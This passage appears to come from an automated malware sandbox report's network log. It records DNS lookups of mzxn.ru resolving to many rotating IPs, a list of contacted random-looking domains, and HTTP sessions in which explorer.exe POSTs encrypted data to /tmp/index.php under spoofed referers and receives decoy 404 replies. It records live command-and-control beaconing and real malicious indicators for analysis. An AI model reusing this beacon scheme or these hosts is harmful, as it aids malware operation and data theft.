                          Aug 6, 2024 14:48:26.047180891 CEST1.1.1.1192.168.2.40xbda5No error (0)mzxn.ru189.163.127.97A (IP address)IN (0x0001)false
                          Aug 6, 2024 14:48:26.047180891 CEST1.1.1.1192.168.2.40xbda5No error (0)mzxn.ru109.175.29.39A (IP address)IN (0x0001)false
                          Aug 6, 2024 14:48:26.047180891 CEST1.1.1.1192.168.2.40xbda5No error (0)mzxn.ru211.40.39.251A (IP address)IN (0x0001)false
                          Aug 6, 2024 14:48:26.047180891 CEST1.1.1.1192.168.2.40xbda5No error (0)mzxn.ru191.191.224.16A (IP address)IN (0x0001)false
                          Aug 6, 2024 14:48:26.047180891 CEST1.1.1.1192.168.2.40xbda5No error (0)mzxn.ru186.145.236.93A (IP address)IN (0x0001)false
                          Aug 6, 2024 14:48:26.047180891 CEST1.1.1.1192.168.2.40xbda5No error (0)mzxn.ru211.202.224.10A (IP address)IN (0x0001)false
                          Aug 6, 2024 14:48:26.047180891 CEST1.1.1.1192.168.2.40xbda5No error (0)mzxn.ru190.13.174.94A (IP address)IN (0x0001)false
                          Aug 6, 2024 14:48:26.047180891 CEST1.1.1.1192.168.2.40xbda5No error (0)mzxn.ru200.63.106.141A (IP address)IN (0x0001)false
                          Aug 6, 2024 14:48:26.047180891 CEST1.1.1.1192.168.2.40xbda5No error (0)mzxn.ru179.52.91.39A (IP address)IN (0x0001)false
                          Aug 6, 2024 14:48:26.047480106 CEST1.1.1.1192.168.2.40xbda5No error (0)mzxn.ru58.151.148.90A (IP address)IN (0x0001)false
                          Aug 6, 2024 14:48:26.047480106 CEST1.1.1.1192.168.2.40xbda5No error (0)mzxn.ru189.163.127.97A (IP address)IN (0x0001)false
                          Aug 6, 2024 14:48:26.047480106 CEST1.1.1.1192.168.2.40xbda5No error (0)mzxn.ru109.175.29.39A (IP address)IN (0x0001)false
                          Aug 6, 2024 14:48:26.047480106 CEST1.1.1.1192.168.2.40xbda5No error (0)mzxn.ru211.40.39.251A (IP address)IN (0x0001)false
                          Aug 6, 2024 14:48:26.047480106 CEST1.1.1.1192.168.2.40xbda5No error (0)mzxn.ru191.191.224.16A (IP address)IN (0x0001)false
                          Aug 6, 2024 14:48:26.047480106 CEST1.1.1.1192.168.2.40xbda5No error (0)mzxn.ru186.145.236.93A (IP address)IN (0x0001)false
                          Aug 6, 2024 14:48:26.047480106 CEST1.1.1.1192.168.2.40xbda5No error (0)mzxn.ru211.202.224.10A (IP address)IN (0x0001)false
                          Aug 6, 2024 14:48:26.047480106 CEST1.1.1.1192.168.2.40xbda5No error (0)mzxn.ru190.13.174.94A (IP address)IN (0x0001)false
                          Aug 6, 2024 14:48:26.047480106 CEST1.1.1.1192.168.2.40xbda5No error (0)mzxn.ru200.63.106.141A (IP address)IN (0x0001)false
                          Aug 6, 2024 14:48:26.047480106 CEST1.1.1.1192.168.2.40xbda5No error (0)mzxn.ru179.52.91.39A (IP address)IN (0x0001)false
                          Aug 6, 2024 14:48:26.047781944 CEST1.1.1.1192.168.2.40xbda5No error (0)mzxn.ru58.151.148.90A (IP address)IN (0x0001)false
                          Aug 6, 2024 14:48:26.047781944 CEST1.1.1.1192.168.2.40xbda5No error (0)mzxn.ru189.163.127.97A (IP address)IN (0x0001)false
                          Aug 6, 2024 14:48:26.047781944 CEST1.1.1.1192.168.2.40xbda5No error (0)mzxn.ru109.175.29.39A (IP address)IN (0x0001)false
                          Aug 6, 2024 14:48:26.047781944 CEST1.1.1.1192.168.2.40xbda5No error (0)mzxn.ru211.40.39.251A (IP address)IN (0x0001)false
                          Aug 6, 2024 14:48:26.047781944 CEST1.1.1.1192.168.2.40xbda5No error (0)mzxn.ru191.191.224.16A (IP address)IN (0x0001)false
                          Aug 6, 2024 14:48:26.047781944 CEST1.1.1.1192.168.2.40xbda5No error (0)mzxn.ru186.145.236.93A (IP address)IN (0x0001)false
                          Aug 6, 2024 14:48:26.047781944 CEST1.1.1.1192.168.2.40xbda5No error (0)mzxn.ru211.202.224.10A (IP address)IN (0x0001)false
                          Aug 6, 2024 14:48:26.047781944 CEST1.1.1.1192.168.2.40xbda5No error (0)mzxn.ru190.13.174.94A (IP address)IN (0x0001)false
                          Aug 6, 2024 14:48:26.047781944 CEST1.1.1.1192.168.2.40xbda5No error (0)mzxn.ru200.63.106.141A (IP address)IN (0x0001)false
                          Aug 6, 2024 14:48:26.047781944 CEST1.1.1.1192.168.2.40xbda5No error (0)mzxn.ru179.52.91.39A (IP address)IN (0x0001)false
                          Aug 6, 2024 14:48:50.617371082 CEST1.1.1.1192.168.2.40xc30eNo error (0)browserupdater.com45.130.41.250A (IP address)IN (0x0001)false
                          Aug 6, 2024 14:48:57.647706985 CEST1.1.1.1192.168.2.40xe998No error (0)mussangroup.com185.149.100.242A (IP address)IN (0x0001)false
                          Aug 6, 2024 14:49:10.118927956 CEST1.1.1.1192.168.2.40x960dNo error (0)mundoparachicas.space188.114.97.3A (IP address)IN (0x0001)false
                          Aug 6, 2024 14:49:10.118927956 CEST1.1.1.1192.168.2.40x960dNo error (0)mundoparachicas.space188.114.96.3A (IP address)IN (0x0001)false
                          Aug 6, 2024 14:50:57.941947937 CEST1.1.1.1192.168.2.40x6e40No error (0)mzxn.ru190.187.52.42A (IP address)IN (0x0001)false
                          Aug 6, 2024 14:50:57.941947937 CEST1.1.1.1192.168.2.40x6e40No error (0)mzxn.ru63.143.98.185A (IP address)IN (0x0001)false
                          Aug 6, 2024 14:50:57.941947937 CEST1.1.1.1192.168.2.40x6e40No error (0)mzxn.ru211.171.233.129A (IP address)IN (0x0001)false
                          Aug 6, 2024 14:50:57.941947937 CEST1.1.1.1192.168.2.40x6e40No error (0)mzxn.ru185.18.245.58A (IP address)IN (0x0001)false
                          Aug 6, 2024 14:50:57.941947937 CEST1.1.1.1192.168.2.40x6e40No error (0)mzxn.ru109.98.58.98A (IP address)IN (0x0001)false
                          Aug 6, 2024 14:50:57.941947937 CEST1.1.1.1192.168.2.40x6e40No error (0)mzxn.ru102.189.6.13A (IP address)IN (0x0001)false
                          Aug 6, 2024 14:50:57.941947937 CEST1.1.1.1192.168.2.40x6e40No error (0)mzxn.ru217.219.131.81A (IP address)IN (0x0001)false
                          Aug 6, 2024 14:50:57.941947937 CEST1.1.1.1192.168.2.40x6e40No error (0)mzxn.ru211.181.24.132A (IP address)IN (0x0001)false
                          Aug 6, 2024 14:50:57.941947937 CEST1.1.1.1192.168.2.40x6e40No error (0)mzxn.ru190.176.246.92A (IP address)IN (0x0001)false
                          Aug 6, 2024 14:50:57.941947937 CEST1.1.1.1192.168.2.40x6e40No error (0)mzxn.ru220.125.3.190A (IP address)IN (0x0001)false
                          Aug 6, 2024 14:50:57.942003012 CEST1.1.1.1192.168.2.40x6e40No error (0)mzxn.ru190.187.52.42A (IP address)IN (0x0001)false
                          Aug 6, 2024 14:50:57.942003012 CEST1.1.1.1192.168.2.40x6e40No error (0)mzxn.ru63.143.98.185A (IP address)IN (0x0001)false
                          Aug 6, 2024 14:50:57.942003012 CEST1.1.1.1192.168.2.40x6e40No error (0)mzxn.ru211.171.233.129A (IP address)IN (0x0001)false
                          Aug 6, 2024 14:50:57.942003012 CEST1.1.1.1192.168.2.40x6e40No error (0)mzxn.ru185.18.245.58A (IP address)IN (0x0001)false
                          Aug 6, 2024 14:50:57.942003012 CEST1.1.1.1192.168.2.40x6e40No error (0)mzxn.ru109.98.58.98A (IP address)IN (0x0001)false
                          Aug 6, 2024 14:50:57.942003012 CEST1.1.1.1192.168.2.40x6e40No error (0)mzxn.ru102.189.6.13A (IP address)IN (0x0001)false
                          Aug 6, 2024 14:50:57.942003012 CEST1.1.1.1192.168.2.40x6e40No error (0)mzxn.ru217.219.131.81A (IP address)IN (0x0001)false
                          Aug 6, 2024 14:50:57.942003012 CEST1.1.1.1192.168.2.40x6e40No error (0)mzxn.ru211.181.24.132A (IP address)IN (0x0001)false
                          Aug 6, 2024 14:50:57.942003012 CEST1.1.1.1192.168.2.40x6e40No error (0)mzxn.ru190.176.246.92A (IP address)IN (0x0001)false
                          Aug 6, 2024 14:50:57.942003012 CEST1.1.1.1192.168.2.40x6e40No error (0)mzxn.ru220.125.3.190A (IP address)IN (0x0001)false
                          Aug 6, 2024 14:50:57.942032099 CEST1.1.1.1192.168.2.40x6e40No error (0)mzxn.ru190.187.52.42A (IP address)IN (0x0001)false
                          Aug 6, 2024 14:50:57.942032099 CEST1.1.1.1192.168.2.40x6e40No error (0)mzxn.ru63.143.98.185A (IP address)IN (0x0001)false
                          Aug 6, 2024 14:50:57.942032099 CEST1.1.1.1192.168.2.40x6e40No error (0)mzxn.ru211.171.233.129A (IP address)IN (0x0001)false
                          Aug 6, 2024 14:50:57.942032099 CEST1.1.1.1192.168.2.40x6e40No error (0)mzxn.ru185.18.245.58A (IP address)IN (0x0001)false
                          Aug 6, 2024 14:50:57.942032099 CEST1.1.1.1192.168.2.40x6e40No error (0)mzxn.ru109.98.58.98A (IP address)IN (0x0001)false
                          Aug 6, 2024 14:50:57.942032099 CEST1.1.1.1192.168.2.40x6e40No error (0)mzxn.ru102.189.6.13A (IP address)IN (0x0001)false
                          Aug 6, 2024 14:50:57.942032099 CEST1.1.1.1192.168.2.40x6e40No error (0)mzxn.ru217.219.131.81A (IP address)IN (0x0001)false
                          Aug 6, 2024 14:50:57.942032099 CEST1.1.1.1192.168.2.40x6e40No error (0)mzxn.ru211.181.24.132A (IP address)IN (0x0001)false
                          Aug 6, 2024 14:50:57.942032099 CEST1.1.1.1192.168.2.40x6e40No error (0)mzxn.ru190.176.246.92A (IP address)IN (0x0001)false
                          Aug 6, 2024 14:50:57.942032099 CEST1.1.1.1192.168.2.40x6e40No error (0)mzxn.ru220.125.3.190A (IP address)IN (0x0001)false
                          • browserupdater.com
                          • mussangroup.com
                          • mundoparachicas.space
                          • lxtihacslghmp.net
                            • mzxn.ru
                          • wbqhwxcwiokrti.com
                          • yrcjsrfdprvic.com
                          • knlbxirdtde.org
                          • nbynuqvcubp.com
                          • uvlrqtxncwdcr.com
                          • fwffjwnakkt.net
                          • hlaxjpgxxibka.net
                          • qxykcmjeqiqyjoi.net
                          • vqtbeoidrbmewm.com
                          • sowqaemgjxhutlr.net
                          • qggmqqxdvbb.org
                          • cypfufcosssb.net
                          • asulighvhvx.org
                          • typuxgfkyjirf.org
                          • alapkefvafgo.net
                          • yclxfxgmqbvjkhy.org
                          • kiaaagbssjkd.net
                          • srhunmufdtubiva.net
                          • jmoobswoyynvmcc.net
                          • nepghogipjla.org
                          • pomgyqmowolnyuhi.com
                          • uxdwmdslnymyde.com
                          • idvimpvmdkks.org
                          • bekxhhsmaopjub.net
                          • gjmkiqrlvkslwsem.org
                          • mgctvlvgdog.org
                          • keqkgetrekoo.net
                          • vqvtaxxtrjbp.net
                          • ovdrqgaphhsrkg.org
                          • jgwoffhiempfd.net
                          • biwmwjkqpuwangh.com
                          • ydamtofmlce.net
                          • yyvupavchggrcv.org
                          • doftqgthwcaw.org
                          • nddnnutqhypaj.com
                          • nmxuerpvqdsp.com
                          • hmylssppqcui.org
                          • viiuigfvqxtv.com
                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.44973658.151.148.90802580C:\Windows\explorer.exe
                          TimestampBytes transferredDirectionData
                          Aug 6, 2024 14:48:26.054833889 CEST278OUTPOST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://lxtihacslghmp.net/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 278
                          Host: mzxn.ru
                          Aug 6, 2024 14:48:26.054867029 CEST278OUTData Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2e 5b 0a 6b 2c 90 f4 76 0b 75 42 48 fe b8
                          Data Ascii: ;nSh/s|xjyt~F-+rQi? 9Yt M@NA .[k,vuBHjpi fe Me'GZMbT4+M YypbY>Mz/po-/#IFjlW~yVM(
                          Aug 6, 2024 14:48:27.855571032 CEST152INHTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:48:27 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Raw: 04 00 00 00 72 e8 85 e9
                          Data Ascii: r


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          1192.168.2.44973758.151.148.90802580C:\Windows\explorer.exe
                          TimestampBytes transferredDirectionData
                          Aug 6, 2024 14:48:27.864784956 CEST279OUTPOST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://wbqhwxcwiokrti.com/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 281
                          Host: mzxn.ru
                          Aug 6, 2024 14:48:27.864795923 CEST281OUTData Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0a 6b 2c 90 f5 76 0b 75 2f 5f b5 83
                          Data Ascii: ;nSh/s|xjyt~F-+rQi? 9Yt M@NA -[k,vu/_H`Oict^m63p82v~b(8;H(CJu$O#z0/c^lV[HPv?}2hKO@1aG%+Y
                          Aug 6, 2024 14:48:29.413307905 CEST484INHTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:48:29 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          2192.168.2.44973858.151.148.90802580C:\Windows\explorer.exe
                          TimestampBytes transferredDirectionData
                          Aug 6, 2024 14:48:29.421967983 CEST278OUTPOST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://yrcjsrfdprvic.com/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 302
                          Host: mzxn.ru
                          Aug 6, 2024 14:48:29.422071934 CEST302OUTData Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 49 5e ae f2
                          Data Ascii: ;nSh/s|xjyt~F-+rQi? 9Yt M@NA -[k,vuI^V5MqcX%`iGbx3eFoHSAD^:LW^\.n%j[8XCEbP4X3uzxa[A?KC
                          Aug 6, 2024 14:48:30.928253889 CEST484INHTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:48:30 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          3192.168.2.44973958.151.148.90802580C:\Windows\explorer.exe
                          TimestampBytes transferredDirectionData
                          Aug 6, 2024 14:48:30.935853004 CEST276OUTPOST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://knlbxirdtde.org/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 162
                          Host: mzxn.ru
                          Aug 6, 2024 14:48:30.935872078 CEST162OUTData Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 08 6b 2c 90 f5 76 0b 75 65 4a ea 89
                          Data Ascii: ;nSh/s|xjyt~F-+rQi? 9Yt M@NA -[k,vueJdUqmr!q4z<rA"BW kY'Cf6Jb
                          Aug 6, 2024 14:48:32.419202089 CEST484INHTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:48:32 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          4192.168.2.44974058.151.148.90802580C:\Windows\explorer.exe
                          TimestampBytes transferredDirectionData
                          Aug 6, 2024 14:48:32.427371979 CEST276OUTPOST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://nbynuqvcubp.com/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 154
                          Host: mzxn.ru
                          Aug 6, 2024 14:48:32.427392960 CEST154OUTData Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 09 6b 2c 90 f5 76 0b 75 4b 06 d9 9f
                          Data Ascii: ;nSh/s|xjyt~F-+rQi? 9Yt M@NA -[k,vuKH.HB,dC[/8{6[AIFO1f<9
                          Aug 6, 2024 14:48:33.946558952 CEST484INHTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:48:33 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          5192.168.2.44974158.151.148.90802580C:\Windows\explorer.exe
                          TimestampBytes transferredDirectionData
                          Aug 6, 2024 14:48:33.954813957 CEST278OUTPOST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://uvlrqtxncwdcr.com/
                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                          Content-Length: 369
                          Host: mzxn.ru
                          Aug 6, 2024 14:48:33.954848051 CEST369OUTData Raw: 3b 6e 53 14 86 cf 68 2f df ab c9 73 07 07 0f bc 7c 78 c1 ec 1f 06 e6 6a 79 74 7e 92 46 c7 b1 18 9b 2d c0 2b 72 19 51 69 9c 96 3f c9 20 39 d4 f0 02 aa 59 74 ef 20 0f f7 4d 40 17 7f 4e e2 1b 1d c7 41 20 ff 2d 5b 0e 6b 2c 90 f5 76 0b 75 6e 26 b1 ed
                          Data Ascii: ;nSh/s|xjyt~F-+rQi? 9Yt M@NA -[k,vun&lZ|jAXwvo(>^>LDZ\Y[5Q)H9>[_r ;\}/|ADAV~xc72$t
                          Aug 6, 2024 14:48:35.534559965 CEST484INHTTP/1.1 404 Not Found
                          Server: nginx/1.26.0
                          Date: Tue, 06 Aug 2024 12:48:35 GMT
                          Content-Type: text/html; charset=utf-8
                          Connection: close
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          6192.168.2.44974258.151.148.90802580C:\Windows\explorer.exe
                          TimestampBytes transferredDirectionData
                          Aug 6, 2024 14:48:35.543487072 CEST276OUTPOST /tmp/index.php HTTP/1.1
                          Connection: Keep-Alive
                          Content-Type: application/x-www-form-urlencoded
                          Accept: */*
                          Referer: http://fwffjwnakkt.net/
